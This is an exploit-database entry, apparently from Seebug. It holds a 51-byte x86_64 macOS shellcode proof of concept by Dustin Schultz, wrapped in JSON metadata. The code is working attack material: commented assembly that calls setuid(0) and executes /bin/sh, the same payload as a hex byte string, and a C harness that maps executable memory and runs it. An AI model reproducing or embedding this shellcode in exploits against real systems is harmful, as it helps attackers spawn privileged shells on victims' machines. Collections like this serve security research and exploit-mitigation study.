OSX/Intel - setuid shell x86_64 - 51 bytes

2014-07-01T00:00:00

Description

No description provided by source.

{"href": "https://www.seebug.org/vuldb/ssvid-70285", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "OSX/Intel - setuid shell x86_64 - 51 bytes", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70285", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n /*\r\n * Title: OSX/Intel - setuid shell x86_64 - 51 bytes\r\n * Date: 2010-11-25\r\n * Tested on: Mac OS X 10.6.5 - Darwin Kernel Version 10.5.0\r\n * Author: Dustin Schultz - twitter: @thexploit\r\n *\r\n * http://thexploit.com\r\n *\r\n * BITS 64\r\n *\r\n * section .text\r\n * global start\r\n *\r\n * start:\r\n * a:\r\n * mov r8b, 0x02 ; Unix class system calls = 2\r\n * shl r8, 24 ; shift left 24 to the upper order bits\r\n * or r8, 0x17 ; setuid = 23, or with class = 0x2000017\r\n * xor edi, edi ; zero out edi\r\n * mov rax, r8 ; syscall number in rax\r\n * syscall ; invoke kernel\r\n * jmp short c ; jump to c\r\n * b:\r\n * pop rdi ; pop ret addr which = addr of /bin/sh\r\n * add r8, 0x24 ; execve = 59, 0x24+r8=0x200003b\r\n * mov rax, r8 ; syscall number in rax\r\n * xor rdx, rdx ; zero out rdx\r\n * push rdx ; null terminate rdi, pushed backwards\r\n * push rdi ; push rdi = pointer to /bin/sh\r\n * mov rsi, rsp ; pointer to null terminated /bin/sh string\r\n * syscall ; invoke the kernel\r\n * c:\r\n * call b ; call b, push ret of /bin/sh\r\n * db '/bin//sh' ; /bin/sh string\r\n*/\r\n\r\n\r\n#include <stdio.h>\r\n#include <sys/mman.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n\r\nint (*sc)();\r\n\r\nchar shellcode[] =\r\n"\\x41\\xb0\\x02\\x49\\xc1\\xe0\\x18\\x49\\x83\\xc8\\x17\\x31\\xff\\x4c\\x89\\xc0"\r\n"\\x0f\\x05\\xeb\\x12\\x5f\\x49\\x83\\xc0\\x24\\x4c\\x89\\xc0\\x48\\x31\\xd2\\x52"\r\n"\\x57\\x48\\x89\\xe6\\x0f\\x05\\xe8\\xe9\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f"\r\n"\\x2f\\x73\\x68";\r\n\r\nint main(int argc, char **argv) {\r\n\r\n\tvoid *ptr = mmap(0, 0x33, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON\r\n\t\t\t| MAP_PRIVATE, -1, 0);\r\n\r\n\tif (ptr == MAP_FAILED) {\r\n\t\tperror("mmap");\r\n\t\texit(-1);\r\n\t}\r\n\r\n\tmemcpy(ptr, shellcode, sizeof(shellcode));\r\n\tsc = ptr;\r\n\r\n\tsc();\r\n\r\n\treturn 0;\r\n}\r\n\r\n\n ", "id": "SSV:70285", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T15:39:40", "reporter": "Root", "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.4}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645381278}}